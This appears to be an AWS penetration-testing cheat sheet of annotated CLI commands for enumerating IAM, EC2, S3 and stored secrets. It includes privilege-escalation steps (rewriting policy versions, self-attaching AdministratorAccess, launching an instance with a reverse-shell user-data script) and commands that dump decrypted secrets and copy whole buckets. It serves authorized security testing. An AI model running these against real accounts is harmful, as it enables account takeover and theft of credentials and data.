AWS pentesting — IAM privilege escalation, S3 misconfigs, Lambda abuse, EC2 SSRF.
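# Who am I — sts:GetCallerIdentity needs no IAM permission and cannot be denied,
# so it works with any valid credentials. It tells you the account, the principal
# ARN, and whether you are an IAM user or an assumed role (which decides which of
# the user-centric calls below even apply).
aws sts get-caller-identity
# IAM enumeration for user principals. Set the name once so none of the
# --user-name options below are run with an empty value. Without --user-name,
# get-user describes the caller — but only when the caller is an IAM user, not
# an assumed role.
USER_NAME="<user-name>"
aws iam get-user --user-name "$USER_NAME"
aws iam list-attached-user-policies --user-name "$USER_NAME"
aws iam list-user-policies --user-name "$USER_NAME"
aws iam list-groups-for-user --user-name "$USER_NAME"
# Effective permissions also come from group policies: for each group returned
# above, run list-attached-group-policies and list-group-policies the same way.
# Roles: --max-items paginates; follow NextToken, or drop it to auto-page everything.
aws iam list-roles --max-items 100
# Full snapshot of users, groups, roles and policy documents in one call, if
# iam:GetAccountAuthorizationDetails is allowed. Output is large — redirect to a file.
aws iam get-account-authorization-details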
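# EC2 / networking. These calls are region-scoped: with only the default region
# configured you silently miss instances, groups and VPCs everywhere else, so
# walk every enabled region (needs ec2:DescribeRegions).
read -r -a regions <<<"$(aws ec2 describe-regions --query 'Regions[].RegionName' --output text)"
for region in "${regions[@]}"; do
  printf '== %s ==\n' "$region"
  aws ec2 describe-instances --region "$region" --output table
  aws ec2 describe-security-groups --region "$region" --output table
  aws ec2 describe-vpcs --region "$region" --output table
done
# Quick triage: security groups with any ingress rule open to the whole internet
# (current region only; add --region to repeat per region).
aws ec2 describe-security-groups \
  --query 'SecurityGroups[?IpPermissions[?IpRanges[?CidrIp==`0.0.0.0/0`]]].[GroupId,GroupName]' \
  --output table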
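# S3. Set the bucket once so the commands below are never run with an empty name.
BUCKET="<bucket-name>"
# Buckets the caller can see in its own account (s3:ListAllMyBuckets).
aws s3 ls
# Full object listing. On a large bucket this walks every key — scope it with a
# prefix (s3://bucket/prefix/) or --page-size to keep it bounded.
aws s3 ls "s3://$BUCKET" --recursive --human-readable
# Legacy ACL grants (needs s3:GetBucketAcl).
aws s3api get-bucket-acl --bucket "$BUCKET"
# The policy comes back as an escaped JSON string inside a "Policy" field, so
# extract that field before pretty-printing or Principal/Action/Condition stay
# unreadable. Returns NoSuchBucketPolicy when the bucket has none.
aws s3api get-bucket-policy --bucket "$BUCKET" --query Policy --output text | python3 -m json.tool
# Bucket-level exposure summary: IsPublic, and which public-access-block flags are on.
aws s3api get-bucket-policy-status --bucket "$BUCKET"
aws s3api get-public-access-block --bucket "$BUCKET"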
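# Secrets. Values print to the terminal and end up in shell history / scrollback
# and any session recording — handle the output like any other credential material.
aws secretsmanager list-secrets
# get-secret-value requires --secret-id (a name or ARN from the listing above);
# it needs secretsmanager:GetSecretValue and, for secrets encrypted with a
# customer-managed key, kms:Decrypt on that key. --query keeps only the value.
aws secretsmanager get-secret-value --secret-id "<secret-name-or-arn>" --query SecretString --output text
# Parameter Store: describe first, then fetch. --with-decryption returns
# SecureString values (also needs kms:Decrypt). --path / --recursive pulls the
# entire hierarchy, so narrow the path on busy accounts.
aws ssm describe-parameters
aws ssm get-parameters-by-path --path / --recursive --with-decryption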
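# Privilege-escalation primitives. Every one of these changes account state and
# is recorded in CloudTrail: confirm it is inside the engagement's authorized
# scope, and note what you changed so it can be reverted afterwards.
#
# iam:CreatePolicyVersion — add a version to a customer-managed policy and make
# it the default, which rewrites that policy for every principal it is attached
# to. A policy holds at most 5 versions: if the call fails with a LimitExceeded
# error, delete an old non-default version first (aws iam delete-policy-version).
# Keep the previous default around so set-default-policy-version can roll back.
aws iam create-policy-version --policy-arn "<policy-arn>" --policy-document file://admin_policy.json --set-as-default
# iam:PassRole + ec2:RunInstances — launch an instance with a privileged instance
# profile. Needs iam:PassRole on the profile's role and an AMI valid in the
# target region. On cloud-init AMIs user-data runs as root at first boot, and the
# role's credentials are then served by the instance metadata service.
aws ec2 run-instances --image-id "<ami-id>" --instance-type t2.micro --iam-instance-profile Name=AdminProfile --user-data file://revshell.sh
# iam:CreateLoginProfile — give an IAM user console access. Fails with
# EntityAlreadyExists when the user already has a profile (that case is
# iam:UpdateLoginProfile, a separate permission), and the password must satisfy
# the account password policy. Supply it from a variable rather than a literal so
# it does not sit in the command line and shell history.
: "${NEW_PASSWORD:?set NEW_PASSWORD to a password that meets the account policy}"
aws iam create-login-profile --user-name "<target-user>" --password "$NEW_PASSWORD" --no-password-reset-required
# iam:AttachUserPolicy — attach AdministratorAccess to your own user.
aws iam attach-user-policy --user-name "<your-user>" --policy-arn arn:aws:iam::aws:policy/AdministratorAccess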
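# PMapper: build the principal graph for the target profile, then query it.
# Pass the same --profile to the query so it reads the graph you just built.
pmapper --profile pentest graph create
# Every principal with a known privilege-escalation path.
pmapper --profile pentest query "preset privesc *"
# Who can reach a specific role. Account IDs are 12 digits — an ARN with the
# wrong ID (e.g. 9 digits) simply matches nothing in the graph.
pmapper --profile pentest query "who can do sts:AssumeRole with arn:aws:iam::123456789012:role/AdminRole"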
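# Public bucket enumeration. --no-sign-request sends no credentials at all, so a
# successful listing means anonymous s3:ListBucket is granted to everyone.
TARGET_BUCKET="<bucket-name>"
aws s3 ls "s3://$TARGET_BUCKET" --no-sign-request
# Pulling a whole bucket can be huge and may exceed what the engagement allows:
# dry-run first to see the size, and land the data in a private per-run
# directory rather than a predictable /tmp path other local users can read.
LOOT_DIR="$(mktemp -d)"
aws s3 sync "s3://$TARGET_BUCKET" "$LOOT_DIR" --no-sign-request --dryrun
aws s3 sync "s3://$TARGET_BUCKET" "$LOOT_DIR" --no-sign-request
# ACL check (needs s3:GetBucketAcl). Grantee URIs that mean "public":
#   http://acs.amazonaws.com/groups/global/AllUsers           -> anyone, unauthenticated
#   http://acs.amazonaws.com/groups/global/AuthenticatedUsers -> any AWS account, not just yours
aws s3api get-bucket-acl --bucket "$TARGET_BUCKET"
# Pre-signed URL (needs s3:GetObject on the key). The URL carries a signature
# from your credentials and anyone holding it can fetch the object until it
# expires (max 604800 s) — keep the lifetime short and never paste the URL into
# reports or tickets.
aws s3 presign "s3://$TARGET_BUCKET/sensitive_file" --expires-in 3600
# Bucket policy: the document is an escaped string in the "Policy" field, so
# extract it before pretty-printing; get-bucket-policy-status gives the quick
# IsPublic verdict for the policy.
aws s3api get-bucket-policy --bucket "$TARGET_BUCKET" --query Policy --output text | python3 -m json.tool
aws s3api get-bucket-policy-status --bucket "$TARGET_BUCKET"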
`cloudfox aws all-checks` runs every CloudFox AWS module in a single pass and automatically identifies privilege-escalation paths, exposed secrets, open storage and more. It can only report what the supplied credentials are allowed to see, so treat its output as a starting list and confirm each finding manually before acting on it.